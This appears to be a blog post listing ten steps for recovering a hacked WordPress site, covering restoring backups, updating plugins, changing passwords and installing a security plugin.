Prevention is always better than cure, but here are 10 steps to follow if your WordPress site is hacked.
1# Close your site off to the public
Preventing access to your compromised site can help protect your brand and your customers. Your hacked site might be displaying porn, distributing malware or publishing other unwanted content.
Restrict access to you site, your hosting company can help with this and may even take this step if they believe your website has been breached.
2# Access the damage done and investigate the cause
An understanding of how a hacker accessed your site is crucial to stop it happening again. Out of date plugins, themes and core, might be missing security updates and could provide a route into your site. These exploits are often well publicised, so should be fixed as soon as possible.
Look for new files, new users, new content, access logs and again ask your hosting company who may have monitoring software. Your hosting company may prove invaluable in helping you to get your site back up and in shape if you’re not tech savvy. Malware and virus protection, as well as security options such as IP restrictions for FTP access can often be enabled via your hosting control panel.
3# Revert your database and files to back to a time before the attack
Malicious code is not always easy to find, so I’d recommend reverting back to a earlier ‘clean’ backup if possible. This will take you back to a version of your site before it was compromised, complete with the security hole which you should try to resolve immediately afterwards.
4# Remove any unused themes and plugins
The more themes and plugins your site has, the more potential security holes it could have. It makes sense to remove unused theme and plugin files. Hackers have been known to use vulnerabilities in outdated versions of popular plugins such as the Slider Revolution plugin.
5# Apply any plugins and theme updates
Upgrade WordPress and all additional plugins/themes to the latest versions available.
6# Change the hosting Control Panel password
It’s possible that a hacker was able to discover your CPanel login, so make sure that you update your password. Use a site like Norton Identity Safe to create a secure 12+ character password.
7# Change the MySQL db connection passwords
Your MySQL database login is easy to find within your WordPress site files, so again make sure that you update your password. A weak password could have allowed a hacker access to your site originally.
8# Change the WordPress admin password
After your website has been hacked, you have to assume the worst and change all logins to your WordPress install. Make passwords secure by using a secure password generator. Hackers often create additional admin accounts, but restoring a backup should mean that this is no longer an issue.
Restricting access to your WordPress login page is also advised. Applying server side Apache login protection will also help against brute force attacks,
9# Install a WP security plugin
Security plugins such as WordFence can help you to recover your site from an attack and prevent your site from being compromised again.
You can;
- scan your version of plugins against their repos, to discover updates and potentially malicious files.
- track/block access to your site
- enable a firewall
Here are a few more security tips from an earlier blog post ‘Cyber security for small businesses‘.
10# Stay aware, sign up to security newsletters
WordFence also has a great newsletter, that can let you know about exploits to popular WP plugins. Learning about the release of a security patch or plugin vulnerability early, could save you the headache of having to undo the work of a hacker.
One Comment